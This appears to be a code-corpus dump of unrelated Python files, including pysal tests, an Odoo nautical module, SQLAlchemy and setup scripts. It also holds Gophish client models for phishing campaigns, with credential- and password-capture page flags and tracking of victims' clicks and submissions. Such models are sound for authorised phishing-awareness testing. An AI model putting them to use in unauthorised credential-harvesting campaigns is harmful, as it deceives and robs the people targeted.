self.assertAlmostEquals(self.wr.pct_nonzero, 8.329862557267806)
def test_knnW_from_array(self):
import numpy as np
x, y = np.indices((5, 5))
x.shape = (25, 1)
y.shape = (25, 1)
data = np.hstack([x, y])
wnn2 = user.knnW_from_array(data, k=2)
wnn4 = user.knnW_from_array(data, k=4)
self.assertEquals(set(wnn4.neighbors[0]), set([1, 5, 6, 2]))
self.assertEquals(set(wnn4.neighbors[5]), set([0, 6, 10, 1]))
self.assertEquals(set(wnn2.neighbors[0]), set([1, 5]))
self.assertEquals(set(wnn2.neighbors[5]), set([0, 6]))
self.assertAlmostEquals(wnn2.pct_nonzero, 8.0)
self.assertAlmostEquals(wnn4.pct_nonzero, 16.0)
wnn4 = user.knnW_from_array(data, k=4)
self.assertEquals(set(wnn4.neighbors[0]), set([1, 5, 6, 2]))
'''
wnn3e = pysal.knnW(data, p=2, k=3)
self.assertEquals(set(wnn3e.neighbors[0]),set([1, 5, 6]))
wnn3m = pysal.knnW(data, p=1, k=3)
self.assertEquals(set(wnn3m.neighbors[0]), set([1, 5, 2]))
'''
def test_knnW_from_shapefile(self):
wc = user.knnW_from_shapefile(pysal_examples.get_path("columbus.shp"))
self.assertAlmostEquals(wc.pct_nonzero, 4.081632653061225)
wc3 = user.knnW_from_shapefile(pysal_examples.get_path(
"columbus.shp"), k=3)
self.assertEquals(wc3.weights[1], [1, 1, 1])
self.assertEquals(set(wc3.neighbors[1]), set([3, 0, 7]))
self.assertEquals(set(wc.neighbors[0]), set([2, 1]))
w = user.knnW_from_shapefile(pysal_examples.get_path('juvenile.shp'))
self.assertAlmostEquals(w.pct_nonzero, 1.1904761904761904)
w1 = user.knnW_from_shapefile(
pysal_examples.get_path('juvenile.shp'), k=1)
self.assertAlmostEquals(w1.pct_nonzero, 0.5952380952380952)
def test_threshold_binaryW_from_array(self):
points = [(10, 10), (20, 10), (40, 10), (15, 20), (30, 20), (30, 30)]
w = user.threshold_binaryW_from_array(points, threshold=11.2)
self.assertEquals(w.weights, {0: [1, 1], 1: [1, 1], 2: [],
3: [1, 1], 4: [1], 5: [1]})
self.assertTrue(neighbor_equality(w, W({0: [1, 3], 1: [0, 3],
2: [ ], 3: [0, 1],
4: [5], 5: [4]})))
def test_threshold_binaryW_from_shapefile(self):
w = user.threshold_binaryW_from_shapefile(pysal_examples.get_path(
"columbus.shp"), 0.62, idVariable="POLYID")
self.assertEquals(w.weights[1], [1, 1])
def test_threshold_continuousW_from_array(self):
points = [(10, 10), (20, 10), (40, 10), (15, 20), (30, 20), (30, 30)]
wid = user.threshold_continuousW_from_array(points, 11.2)
wds = {wid.neighbors[0][i]: v for i, v in enumerate(wid.weights[0])}
self.assertEqual(wds, {1: 0.10000000000000001,
3: 0.089442719099991588})
wid2 = user.threshold_continuousW_from_array(points, 11.2, alpha=-2.0)
wds = {wid2.neighbors[0][i]: v for i, v in enumerate(wid2.weights[0])}
self.assertEquals(wid2.weights[0], [0.01, 0.0079999999999999984])
def test_threshold_continuousW_from_shapefile(self):
w = user.threshold_continuousW_from_shapefile(pysal_examples.get_path(
"columbus.shp"), 0.62, idVariable="POLYID")
wds = {w.neighbors[1][i]:v for i,v in enumerate(w.weights[1])}
self.assertEquals(wds, {2:1.6702346893743334, 3:1.7250729841938093})
def test_kernelW(self):
points = [(10, 10), (20, 10), (40, 10), (15, 20), (30, 20), (30, 30)]
kw = user.kernelW(points)
wds = {kw.neighbors[0][i]:v for i,v in enumerate(kw.weights[0])}
self.assertEquals(wds, {0:1.0, 1:0.50000004999999503,
3:0.44098306152674649})
np.testing.assert_array_almost_equal(
kw.bandwidth, np.array([[20.000002],
[20.000002],
[20.000002],
[20.000002],
[20.000002],
[20.000002]]))
def test_min_threshold_dist_from_shapefile(self):
f = pysal_examples.get_path('columbus.shp')
min_d = user.min_threshold_dist_from_shapefile(f)
self.assertAlmostEquals(min_d, 0.61886415807685413)
def test_kernelW_from_shapefile(self):
kw = user.kernelW_from_shapefile(pysal_examples.get_path(
'columbus.shp'), idVariable='POLYID')
self.assertEquals(set(kw.weights[1]), set([0.0070787731484506233,
0.2052478782400463,
0.23051223027663237,
1.0
]))
np.testing.assert_array_almost_equal(
kw.bandwidth[:3], np.array([[0.75333961], [0.75333961],
[0.75333961]]))
def test_adaptive_kernelW(self):
points = [(10, 10), (20, 10), (40, 10), (15, 20), (30, 20), (30, 30)]
bw = [25.0, 15.0, 25.0, 16.0, 14.5, 25.0]
kwa = user.adaptive_kernelW(points, bandwidths=bw)
wds = {kwa.neighbors[0][i]: v for i, v in enumerate(kwa.weights[0])}
self.assertEqual(wds, {0: 1.0, 1: 0.59999999999999998,
3: 0.55278640450004202,
4: 0.10557280900008403})
np.testing.assert_array_almost_equal(kwa.bandwidth,
np.array([[25.], [15.], [25.],
[16.], [14.5], [25.]]))
kweag = user.adaptive_kernelW(points, function='gaussian')
wds = {kweag.neighbors[0][i]: v for i, v in enumerate(kweag.weights[0])}
self.assertEqual(wds, {0: 0.3989422804014327, 1: 0.26741902915776961,
3: 0.24197074871621341})
np.testing.assert_array_almost_equal(kweag.bandwidth,
np.array([[11.18034101],
[11.18034101],
[20.000002],
[11.18034101],
[14.14213704],
[18.02775818]]))
def test_adaptive_kernelW_from_shapefile(self):
kwa = user.adaptive_kernelW_from_shapefile(
pysal_examples.get_path('columbus.shp'))
wds = {kwa.neighbors[0][i]: v for i, v in enumerate(kwa.weights[0])}
self.assertEquals(wds, {0: 1.0, 2: 0.03178906767736345,
1: 9.9999990066379496e-08})
np.testing.assert_array_almost_equal(kwa.bandwidth[:3],
np.array([[0.59871832],
[0.59871832],
[0.56095647]]))
def test_build_lattice_shapefile(self):
of = "lattice.shp"
user.build_lattice_shapefile(20, 20, of)
w = user.rook_from_shapefile(of)
self.assertEquals(w.n, 400)
os.remove('lattice.shp')
os.remove('lattice.shx')
suite = unittest.TestLoader().loadTestsFromTestCase(Testuser)
if __name__ == '__main__':
runner = unittest.TextTestRunner()
runner.run(suite)
| sjsrey/pysal_core | pysal_core/weights/tests/test_user.py | Python | bsd-3-clause | 8,208 |
#!/usr/bin/python
import os, sys
#specify the location of ncs.py in ncs_lib_path
ncs_lib_path = ('../../../../')
sys.path.append(ncs_lib_path)
import ncs
def run(argv):
sim = ncs.Simulation()
regular_spiking_parameters = sim.addNeuron("regular_spiking","izhikevich",
{
"a": 0.02,
"b": 0.2,
"c": -65.0,
"d": 8.0,
"u": -12.0,
"v": -60.0,
"threshold": 30
})
group_1=sim.addNeuronGroup("group_1",1,regular_spiking_parameters,None)
if not sim.init(argv):
print "failed to initialize simulation."
return
input_parameters = {
"amplitude":10
}
sim.addStimulus("rectangular_current", input_parameters, group_1, 1, 0.01, 1.0)
voltage_report=sim.addReport("group_1", "neuron", "neuron_voltage", 1, 0.0, 1.0)
voltage_report.toAsciiFile("./regular_spiking_izh.txt")
sim.run(duration=1.0)
return
if __name__ == "__main__":
run(sys.argv)
| BrainComputationLab/ncs | python/samples/models/izh/regular_spiking_izh.py | Python | bsd-2-clause | 938 |
from gpc.gpc import *
from gpc import spec_reader
def main():
log = Log('log')
storage = Storage('storage')
graph = spec_reader.graph_from_spec('simple.yaml')
runner = Runner(log, storage, graph)
runner.make('c')
responsible_runs = log.get_provenance(digest_file('c'))
print('The file was produced by %i run(s):' % len(responsible_runs))
for r in responsible_runs:
#print_run(r)
print(r)
if __name__ == '__main__':
main()
| rasmuse/graph-prov-test | test.py | Python | lgpl-3.0 | 482 |
from setuptools import setup
import os
setup(
name='fbterminal',
version='0.2.1',
description='Access Facebook on Terminal',
packages=['fbterminal'],
license='MIT',
author='Akash Kothawale',
author_email='io@decached.com',
url='http://decached.com/fbterminal',
install_requires='requests>=1.2.3',
entry_points={'console_scripts': ['fbterminal = fbterminal.terminal:command_line_runner']},
data_files=[(os.path.expanduser('~') + '/', ['fbterminal/.fbterminal'])]
)
os.system('chown ' + os.getlogin() + ' ~/.fbterminal')
| decached/fbterminal | setup.py | Python | mit | 564 |
# -*- coding: utf-8 -*-
##############################################################################
# For copyright and license notices, see __openerp__.py file in module root
# directory
##############################################################################
import time
from datetime import datetime, date, timedelta
from dateutil.relativedelta import relativedelta
from openerp.osv import fields, osv
import openerp.addons.decimal_precision as dp
from openerp.tools.translate import _
from openerp import fields as fields_new
from openerp import models, api
from openerp import tools
from openerp.tools import DEFAULT_SERVER_DATE_FORMAT, DEFAULT_SERVER_DATETIME_FORMAT, DATETIME_FORMATS_MAP, float_compare
class craft(models.Model):
# class craft(osv.osv):
"""Craft"""
_inherit = 'nautical.craft'
@api.one
@api.depends('role_book_ids.estimated_dep_date','role_book_ids.est_arrival_date','role_book_ids')
def _cal_role(self):
role_books = self.env['nautical.role_book'].search([('craft_id','=',self.id)], order='estimated_dep_date desc')
if role_books:
self.role_book_id = role_books[0]
self.estimated_dep_date = role_books[0].estimated_dep_date
self.est_arrival_date = role_books[0].est_arrival_date
else:
self.role_book_id = False
role_book_id = fields_new.Many2one(
'nautical.role_book',
string='Role book',
compute='_cal_role',
store=True
)
estimated_dep_date = fields_new.Datetime(
# related='role_book_id.estimated_dep_date',
compute='_cal_role',
string='Estimated Departure Date',
store=True
)
est_arrival_date = fields_new.Datetime(
compute='_cal_role',
# related='role_book_id.est_arrival_date',
string='Estimated Arrival Date',
store=True
)
company_id = fields_new.Many2one(
'res.company',
'Company',
required=True,
default=lambda self: self.env.user.company_id,
)
def name_get(self, cr, uid, ids, context=None):
# always return the full hierarchical name
res = {}
for line in self.browse(cr, uid, ids):
if line.name and line.owner_id.name:
sep = ' - '
else:
sep = ''
res[line.id] = (line.name or '')+ sep + line.owner_id.name
return res.items()
def name_search(self, cr, user, name='', args=None, operator='ilike', context=None, limit=100):
if not args:
args = []
ids = set()
if name:
ids.update(self.search(cr, user, args + [('name',operator,name)], limit=(limit and (limit-len(ids)) or False) , context=context))
if not limit or len(ids) < limit:
ids.update(self.search(cr, user, args + [('owner_id.name',operator,name)], limit=limit, context=context))
ids = list(ids)
else:
ids = self.search(cr, user, args, limit=limit, context=context)
result = self.name_get(cr, user, ids, context=context)
return result
def _amount_all(self, cr, uid, ids, field_name, arg, context=None):
tax_obj = self.pool.get('account.tax')
cur_obj = self.pool.get('res.currency')
res = {}
date_order = time.strftime(DEFAULT_SERVER_DATE_FORMAT)
for record in self.browse(cr, uid, ids, context=context):
res[record.id] = {
'amount_untaxed': 0.0,
'amount_tax': 0.0,
'amount_total': 0.0,
'price_unit': 0.0,
}
# Get price
price_unit = self.pool.get('product.pricelist').price_get(cr, uid, [record.pricelist_id.id],
record.product_id.id, 1.0, record.owner_id.id, {
'uom': record.product_id.uom_id.id,
# 'uom': result.get('product_uom'),
'date': date_order,
})[record.pricelist_id.id]
# [record.pricelist_id.id]
val = 0.0
cur = record.owner_id.property_product_pricelist.currency_id
# res[record.id]['price_unit'] = 0.0
res[record.id]['price_unit'] = cur_obj.round(cr, uid, cur, price_unit)
price = price_unit * (1 - (record.discount or 0.0) / 100.0)
# price = record.price_unit * (1 - (record.discount or 0.0) / 100.0)
# price = 0.0
taxes = tax_obj.compute_all(cr, uid, record.tax_id, price, 1, record.product_id, record.owner_id)
res[record.id]['amount_untaxed'] = cur_obj.round(cr, uid, cur, price)
for c in taxes['taxes']:
val += c.get('amount', 0.0)
res[record.id]['amount_tax'] = cur_obj.round(cr, uid, cur, val)
res[record.id]['amount_total'] = cur_obj.round(cr, uid, cur, taxes['total_included'])
return res
def _get_image(self, cr, uid, ids, name, args, context=None):
result = dict.fromkeys(ids, False)
for obj in self.browse(cr, uid, ids, context=context):
result[obj.id] = tools.image_get_resized_images(obj.image, avoid_resize_medium=True)
return result
def _get_location_string(self, cr, uid, ids, name, args, context=None):
result = {}
for obj in self.browse(cr, uid, ids, context=context):
loc_name = ''
for location in obj.location_ids:
loc_name += location.complete_ref + ', '
result[obj.id] = loc_name
return result
# def _cal_role(self, cr, uid, ids, name, args, context=None):
# result = {}
# role_obj=self.pool['nautical.role_book']
# for craft in self.browse(cr, uid, ids, context=context):
# role_book_id = False
# role_book_ids = role_obj.search(cr, uid, [('craft_id','=',craft.id)], order='estimated_dep_date desc', context=context)
# if role_book_ids:
# role_book_id = role_book_ids[0]
# result[craft.id] = role_book_id
# return result
def _set_image(self, cr, uid, id, name, value, args, context=None):
return self.write(cr, uid, [id], {'image': tools.image_resize_image_big(value)}, context=context)
_columns = {
# Images
'image': fields.binary("Image",
help="This field holds the image used as image for the craft, limited to 1024x1024px."),
'image_medium': fields.function(_get_image, fnct_inv=_set_image,
string="Medium-sized image", type="binary", multi="_get_image",
store={
'nautical.craft': (lambda self, cr, uid, ids, c={}: ids, ['image'], 10),
},
help="Medium-sized image of the craft. It is automatically "\
"resized as a 128x128px image, with aspect ratio preserved, "\
"only when the image exceeds one of those sizes. Use this field in form views or some kanban views."),
'image_small': fields.function(_get_image, fnct_inv=_set_image,
string="Small-sized image", type="binary", multi="_get_image",
store={
'nautical.craft': (lambda self, cr, uid, ids, c={}: ids, ['image'], 10),
},
help="Small-sized image of the craft. It is automatically "\
"resized as a 64x64px image, with aspect ratio preserved. "\
"Use this field anywhere a small image is required."),
# Others
'craft_type': fields.related('product_id', 'craft_type', type='char', string='Craft Type Code',),
'partner_payment_earliest_due_date': fields.related('owner_id', 'payment_earliest_due_date', type='char', string='Worst Due Date',),
'locations_string': fields.function(_get_location_string, string='Locations', type='char'),
# TODO. Could be good to add states restricion "readonly=True, states={'draft': [('readonly', False)]}"" to all this fields
'account_invoice_line_ids': fields.one2many('account.invoice.line', 'craft_id', string='Account Invoice Lines', readonly=True),
'price_unit': fields.function(_amount_all, string='Price', digits_compute= dp.get_precision('Product Price'), multi='sums'),
'amount_untaxed': fields.function(_amount_all, string='Untaxed Amount', digits_compute= dp.get_precision('Account'), multi='sums'),
'amount_tax': fields.function(_amount_all, string='Taxes', digits_compute= dp.get_precision('Account'), multi='sums'),
'amount_total': fields.function(_amount_all, string='Total', digits_compute= dp.get_precision('Account'), multi='sums'),
'discount': fields.float('Discount (%)', digits_compute= dp.get_precision('Discount'),),
'tax_id': fields.many2many('account.tax', 'craft_tax_rel', 'craft_id', 'tax_id', 'Taxes',),
'pricelist_id': fields.related('owner_id', 'property_product_pricelist', type='many2one', relation='product.pricelist', string='Pricelist'),
'fiscal_position': fields.related('owner_id', 'property_account_position', type='many2one', relation='account.fiscal.position', string='Fiscal Position'),
'currency_id': fields.related('pricelist_id', 'currency_id', type="many2one", relation="res.currency", string="Currency", readonly=True, required=False),
# ADDED TRACKING
# El tracking en locations, por ser m2m, registra los ids y eso no esta bueno
# 'location_ids': fields.one2many('nautical.location', 'craft_id', string='Location', states={'draft':[('readonly', True)],'permanent_cancellation':[('readonly', True)]}, context={'default_type':'normal'}, domain=[('type','=','normal')], track_visibility='onchange'),
'owner_id': fields.many2one('res.partner', string='Owner', readonly=True, states={'draft':[('readonly', False)]}, ondelete='cascade', required=True, track_visibility='onchange'),
'lenght': fields.float(string='Lenght'),
'breadth': fields.float(string='Breadth'),
}
_defaults = {
}
# _order = 'estimated_dep_date, est_arrival_date, id'
def create(self, cr, uid, vals, context=None):
if vals.get('ref','/')=='/':
vals['ref'] = self.pool.get('ir.sequence').get(cr, uid, 'craft_reference') or '/'
return super(craft, self).create(cr, uid, vals, context=context)
def write(self, cr, uid, ids, vals, context=None):
# print ('context', context)
if 'state' in vals:
# self.wkf_preconditions(cr, uid, ids, vals, context=context)
if vals['state'] not in 'check_due':
self.create_craft_record(cr, uid, ids, vals, context=context)
vals['last_action_date'] = datetime.now()
ret = super(craft, self).write(cr, uid, ids, vals, context=context)
return ret
#TODO mover este metodo a el modulo nautical_portal
def action_reserver(self, cr, uid, ids, context=None):
reserve_obj = self.pool['nautical_portal.reserve_boat']
if self.test_partner_dispatch(cr, 1, ids):
reserve_obj.reserve(cr, uid, ids, context=None)
else:
raise osv.except_osv(_('Error!'),
_('Member does not have the fee per day.') )
return True
def craft_request(self, cr, uid, ids, request_type, partner_id, context=None):
if request_type == 'sail':
state = 'to_dispatch'
elif request_type== 'transitional_retirement':
state = 'transitional_retirement'
elif request_type== 'in_reparation':
state = 'in_reparation'
elif request_type== 'in_custody':
state = 'in_custody'
self.write(cr, uid, ids, {'aux_requestor_id': partner_id, 'state': state}, context)
# for craft_id in ids:
# workflow.trg_validate(uid, 'nautical.craft', craft_id, signal, cr)
def create_craft_record(self, cr, uid, ids, vals, context=None):
craft_record_obj = self.pool.get('nautical.craft_record')
context = context or {}
# requestor_id = context.get('requestor_id', False)
for craft in self.browse(cr, uid, ids, context):
record_vals = {
'craft_id': craft.id,
# 'date': ,
# 'user_id': ,
'requestor_id': craft.aux_requestor_id.id,
'type': vals['state'] or '',
}
craft_record_obj.create(cr, uid, record_vals, context=context)
self.write(cr, uid, ids, {'aux_requestor_id':False}, context)
def wkf_preconditions(self, cr, uid, ids, vals, context=None):
if 'state' not in vals:
return
# if vals['state'] == 'contracted':
# self.check_contract_permanent_cancellation(cr, uid, ids, context=context)
def onchange_partner_id(self, cr, uid, ids, part, context=None):
if not part:
return {'value': {'pricelist_id': False, 'fiscal_position': False,}}
part = self.pool.get('res.partner').browse(cr, uid, part, context=context)
pricelist = part.property_product_pricelist and part.property_product_pricelist.id or False
# payment_term = part.property_payment_term and part.property_payment_term.id or False
fiscal_position = part.property_account_position and part.property_account_position.id or False
val = {
# 'payment_term': payment_term,
'fiscal_position': fiscal_position,
}
if pricelist:
val['pricelist_id'] = pricelist
return {'value': val}
def product_id_change(self, cr, uid, ids, pricelist, product_id, partner_id=False, update_tax=True, fiscal_position=False, context=None):
# Partner would be the owner
context = context or {}
warning = {}
product_uom_obj = self.pool.get('product.uom')
partner_obj = self.pool.get('res.partner')
product_obj = self.pool.get('product.product')
context = {'partner_id': partner_id}
warning_msgs = ''
result = {}
domain = {}
if product_id:
if not partner_id:
raise osv.except_osv(_('No Owner Defined!'), _('Before choosing a product,\n select an owner.'))
product_obj = product_obj.browse(cr, uid, product_id, context=context)
fpos = fiscal_position and self.pool.get('account.fiscal.position').browse(cr, uid, fiscal_position) or False
if update_tax: #The quantity only have changed
result['tax_id'] = self.pool.get('account.fiscal.position').map_tax(cr, uid, fpos, product_obj.taxes_id)
result['product_uom'] = product_obj.uom_id.id
result['craft_type'] = product_obj.craft_type
date_order = time.strftime(DEFAULT_SERVER_DATE_FORMAT)
if not pricelist:
warn_msg = _('You have to select an owner!\n'
'Please set one before choosing a product.')
warning_msgs += _("No Pricelist ! : ") + warn_msg +"\n\n"
else:
price = self.pool.get('product.pricelist').price_get(cr, uid, [pricelist],
product_id, 1.0, partner_id, {
'uom': result.get('product_uom'),
'date': date_order,
})[pricelist]
if price is False:
warn_msg = _("Cannot find a pricelist line matching this product and quantity.\n"
"You have to change either the product, the quantity or the pricelist.")
warning_msgs += _("No valid pricelist line found ! :") + warn_msg +"\n\n"
else:
result.update({'price_unit': price})
if warning_msgs:
warning = {
'title': _('Configuration Error!'),
'message' : warning_msgs
}
else:
result['product_uom'] = False
result['craft_type'] = False
result['price_unit'] = False
result['tax_id'] = False
return {'value': result, 'domain': domain, 'warning': warning}
def button_dummy(self, cr, uid, ids, context=None):
return True
def test_partner_dispatch(self, cr, uid, ids, *args):
user_obj=self.pool['res.users']
company_obj = self.pool['res.company']
craft = self.browse(cr, uid, ids, context=None)[0]
company_ids = user_obj.search(cr, uid, [('company_id','=',craft.owner_id.company_id.id)], context=None)
company_id=company_obj.browse(cr, uid, company_ids, context=None)[0]
months_debt=company_id.debt_limit_months
# Test if partner due date is highter than 2 months. If not, return true so he can dispatch. Else, return False
if months_debt == 0 or not months_debt:
return True
else:
tolerance_date = (datetime.today() + relativedelta(months=-months_debt)).strftime('%Y-%m-%d')
for record in self.browse(cr, uid, ids, context={}):
if not record.owner_id.payment_earliest_due_date or record.owner_id.payment_earliest_due_date >= tolerance_date:
return True
else:
return False
def action_set_stored(self, cr, uid, ids, *args):
self.write(cr, uid, ids, {'state': 'stored'})
return True
def action_set_picked(self, cr, uid, ids, *args):
self.write(cr, uid, ids, {'state': 'picked'})
return True
def action_set_dispached(self, cr, uid, ids, *args):
self.write(cr, uid, ids, {'state': 'sailing'})
return True
| ingadhoc/odoo-nautical | nautical_x/craft.py | Python | agpl-3.0 | 17,753 |
from datetime import datetime
from dateutil.tz import tzlocal
import json as _json
import dateutil.parser
def parse_date(datestr):
""" Parses an ISO 8601 formatted date from Gophish """
return dateutil.parser.parse(datestr)
class Model(object):
def __init__(self):
self._valid_properties = {}
def as_dict(self):
""" Returns a dict representation of the resource """
result = {}
for key in self._valid_properties:
val = getattr(self, key)
if isinstance(val, datetime):
val = val.isoformat()
# Parse custom classes
elif val and not isinstance(val, (int, float, str, list, dict)):
val = val.as_dict()
# Parse lists of objects
elif isinstance(val, list):
val = [e.as_dict() for e in val]
# Add it if it's not None
if val:
result[key] = val
return result
@classmethod
def parse(cls, json):
"""Parse a JSON object into a model instance."""
raise NotImplementedError
class Campaign(Model):
_valid_properties = {
'id': None,
'name': None,
'created_date': datetime.now(tzlocal()),
'launch_date': datetime.now(tzlocal()),
'completed_date': None,
'template': None,
'page': None,
'results': [],
'status': None,
'timeline': [],
'smtp': None,
'url': None,
'groups': [],
'profile': None
}
def __init__(self, **kwargs):
""" Creates a new campaign instance """
for key, default in Campaign._valid_properties.items():
setattr(self, key, kwargs.get(key, default))
@classmethod
def parse(cls, json):
campaign = cls()
for key, val in json.items():
# TODO Add date parsing
if key == 'results':
results = [Result.parse(result) for result in val]
setattr(campaign, key, results)
elif key == 'timeline':
if val is not None:
timeline = [TimelineEntry.parse(entry) for entry in val]
setattr(campaign, key, timeline)
elif key == 'template':
setattr(campaign, key, Template.parse(val))
elif key == 'page':
setattr(campaign, key, Page.parse(val))
elif key == 'smtp':
setattr(campaign, key, SMTP.parse(val))
elif key in cls._valid_properties:
setattr(campaign, key, val)
return campaign
class CampaignSummaries(Model):
''' Represents a list of campaign summary objects '''
_valid_properties = {'total': None, 'campaigns': None}
def __init__(self):
""" Creates a new instance of the campaign summaries"""
for key, default in CampaignSummaries._valid_properties.items():
setattr(self, key, default)
@classmethod
def parse(cls, json):
campaign_summaries = cls()
for key, val in json.items():
# TODO Add date parsing
if key == 'campaigns':
summaries = [CampaignSummary.parse(summary) for summary in val]
setattr(campaign_summaries, key, summaries)
elif key in cls._valid_properties:
setattr(campaign_summaries, key, val)
return campaign_summaries
class CampaignSummary(Model):
''' Represents a campaign summary object '''
_valid_properties = {
'id': None,
'name': None,
'status': None,
'created_date': None,
'launch_date': None,
'completed_date': None,
'stats': None
}
def __init__(self):
for key, default in CampaignSummary._valid_properties.items():
setattr(self, key, default)
@classmethod
def parse(cls, json):
summary = cls()
for key, val in json.items():
# TODO Add date parsing
if key == 'stats':
stats = Stat.parse(val)
setattr(summary, key, stats)
elif key in cls._valid_properties:
setattr(summary, key, val)
return summary
class Stat(Model):
_valid_properties = {
'total': None,
'sent': None,
'opened': None,
'clicked': None,
'submitted_data': None,
'error': None
}
def __init__(self):
for key, default in Stat._valid_properties.items():
setattr(self, key, default)
@classmethod
def parse(cls, json):
stat = cls()
for key, val in json.items():
if key in cls._valid_properties:
setattr(stat, key, val)
return stat
class CampaignResults(Model):
''' Represents a succinct view of campaign results '''
_valid_properties = {
'id': None,
'name': None,
'results': [],
'status': None,
'timeline': [],
}
def __init__(self, **kwargs):
""" Creates a new instance of the campaign results object"""
for key, default in CampaignResults._valid_properties.items():
setattr(self, key, kwargs.get(key, default))
@classmethod
def parse(cls, json):
campaign_results = cls()
for key, val in json.items():
# TODO Add date parsing
if key == 'results':
results = [Result.parse(result) for result in val]
setattr(campaign_results, key, results)
elif key == 'timeline':
if val is not None:
timeline = [TimelineEntry.parse(entry) for entry in val]
setattr(campaign_results, key, timeline)
elif key in cls._valid_properties:
setattr(campaign_results, key, val)
return campaign_results
class Result(Model):
_valid_properties = {
'id': None,
'first_name': None,
'last_name': None,
'email': None,
'position': None,
'ip': None,
'latitude': None,
'longitude': None,
'status': None
}
def __init__(self, **kwargs):
for key, default in Result._valid_properties.items():
setattr(self, key, kwargs.get(key, default))
@classmethod
def parse(cls, json):
result = cls()
for key, val in json.items():
if key in cls._valid_properties:
setattr(result, key, val)
return result
class TimelineEntry(Model):
_valid_properties = {
'email': None,
'time': None,
'message': None,
'details': None
}
def __init__(self):
''' Creates a new instance of a timeline entry '''
for key, default in TimelineEntry._valid_properties.items():
setattr(self, key, default)
@classmethod
def parse(cls, json):
entry = cls()
for key, val in json.items():
if key == 'details' and val != "":
details = _json.loads(val)
setattr(entry, key, details)
elif key in cls._valid_properties:
setattr(entry, key, val)
return entry
class User(Model):
""" User contains the attributes for a member of a group
used in Gophish """
_valid_properties = {
'id': None,
'first_name': None,
'last_name': None,
'email': None,
'position': None
}
def __init__(self, **kwargs):
for key, default in User._valid_properties.items():
setattr(self, key, kwargs.get(key, default))
@classmethod
def parse(cls, json):
user = cls()
for key, val in json.items():
if key in cls._valid_properties:
setattr(user, key, val)
return user
class Group(Model):
""" Groups contain one or more users """
_valid_properties = {
'id': None,
'name': None,
'modified_date': datetime.now(tzlocal()),
'targets': []
}
def __init__(self, **kwargs):
for key, default in Group._valid_properties.items():
setattr(self, key, kwargs.get(key, default))
@classmethod
def parse(cls, json):
group = cls()
for key, val in json.items():
if key == 'targets':
targets = [User.parse(user) for user in val]
setattr(group, key, targets)
elif key == 'modified_date':
setattr(group, key, parse_date(val))
elif key in cls._valid_properties:
setattr(group, key, val)
return group
class SMTP(Model):
_valid_properties = {
'id': None,
'interface_type': 'SMTP',
'name': None,
'host': None,
'from_address': None,
'ignore_cert_errors': False,
'modified_date': datetime.now(tzlocal())
}
def __init__(self, **kwargs):
for key, default in SMTP._valid_properties.items():
setattr(self, key, kwargs.get(key, default))
@classmethod
def parse(cls, json):
smtp = cls()
for key, val in json.items():
if key == 'modified_date':
setattr(smtp, key, parse_date(val))
elif key in cls._valid_properties:
setattr(smtp, key, val)
return smtp
class Template(Model):
_valid_properties = {
'id': None,
'name': None,
'text': None,
'html': None,
'modified_date': datetime.now(tzlocal()),
'subject': None,
'attachments': []
}
def __init__(self, **kwargs):
for key, default in Template._valid_properties.items():
setattr(self, key, kwargs.get(key, default))
@classmethod
def parse(cls, json):
template = cls()
for key, val in json.items():
if key == 'modified_date':
setattr(template, key, parse_date(val))
elif key == 'attachments':
attachments = [
Attachment.parse(attachment) for attachment in val
]
setattr(template, key, attachments)
elif key in cls._valid_properties:
setattr(template, key, val)
return template
class Page(Model):
_valid_properties = {
'id': None,
'name': None,
'html': None,
'modified_date': datetime.now(tzlocal()),
'capture_credentials': False,
'capture_passwords': False,
'redirect_url': None
}
def __init__(self, **kwargs):
for key, default in Page._valid_properties.items():
setattr(self, key, kwargs.get(key, default))
@classmethod
def parse(cls, json):
page = cls()
for key, val in json.items():
if key == 'modified_date':
setattr(page, key, parse_date(val))
elif key in cls._valid_properties:
setattr(page, key, val)
return page
class Attachment(Model):
_valid_properties = {'content': None, 'type': None, 'name': None}
@classmethod
def parse(cls, json):
attachment = cls()
for key, val in json.items():
if key in cls._valid_properties:
setattr(attachment, key, val)
return attachment
class Error(Model):
_valid_properties = {'message', 'success', 'data'}
@classmethod
def parse(cls, json):
error = cls()
for key, val in json.items():
if key in cls._valid_properties:
setattr(error, key, val)
return error
| GoSecure/api-client-python | gophish/models.py | Python | mit | 11,653 |
# PYTHON_VERSION>=3.7
from __future__ import annotations
from dataclasses import dataclass
from dataclasses import field
from typing import Any
from typing import Dict
from typing import List
from typing import Optional
from typing import TYPE_CHECKING
from sqlalchemy import Column
from sqlalchemy import ForeignKey
from sqlalchemy import Integer
from sqlalchemy import select
from sqlalchemy import String
from sqlalchemy import Table
from sqlalchemy.orm import registry
from sqlalchemy.orm import relationship
mapper_registry: registry = registry()
@mapper_registry.mapped
@dataclass
class User:
__table__ = Table(
"user",
mapper_registry.metadata,
Column("id", Integer, primary_key=True),
Column("name", String(50)),
Column("fullname", String(50)),
Column("nickname", String(12)),
)
id: int = field(init=False)
name: Optional[str] = None
fullname: Optional[str] = None
nickname: Optional[str] = None
addresses: List[Address] = field(default_factory=list)
if TYPE_CHECKING:
_mypy_mapped_attrs = [id, name, fullname, nickname, addresses]
__mapper_args__: Dict[str, Any] = {
"properties": {"addresses": relationship("Address")}
}
@mapper_registry.mapped
@dataclass
class Address:
__table__ = Table(
"address",
mapper_registry.metadata,
Column("id", Integer, primary_key=True),
Column("user_id", Integer, ForeignKey("user.id")),
Column("email_address", String(50)),
)
id: int = field(init=False)
user_id: int = field(init=False)
email_address: Optional[str] = None
if TYPE_CHECKING:
_mypy_mapped_attrs = [id, user_id, email_address]
stmt = select(User.name).where(User.id.in_([1, 2, 3]))
stmt = select(Address).where(Address.email_address.contains(["foo"]))
| sqlalchemy/sqlalchemy | test/ext/mypy/plugin_files/dataclasses_workaround.py | Python | mit | 1,848 |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Interpreter version: python 2.7
#
# Imports =====================================================================
from setuptools import setup
from setuptools import find_packages
from docs import getVersion
# Variables ===================================================================
CHANGELOG = open('CHANGELOG.rst').read()
LONG_DESCRIPTION = "\n\n".join([
open('README.rst').read(),
open('CONTRIBUTORS.rst').read(),
CHANGELOG
])
# Actual setup definition =====================================================
setup(
name='wa-kat',
version=getVersion(CHANGELOG),
description="Web page analyzator for czech webarchive.",
long_description=LONG_DESCRIPTION,
url='https://github.com/WebArchivCZ/WA-KAT',
author='Bystroushaak',
author_email='bystrousak@kitakitsune.org',
classifiers=[
"Development Status :: 3 - Alpha",
"Programming Language :: Python",
"Programming Language :: Python :: 2.7",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
],
license='MIT',
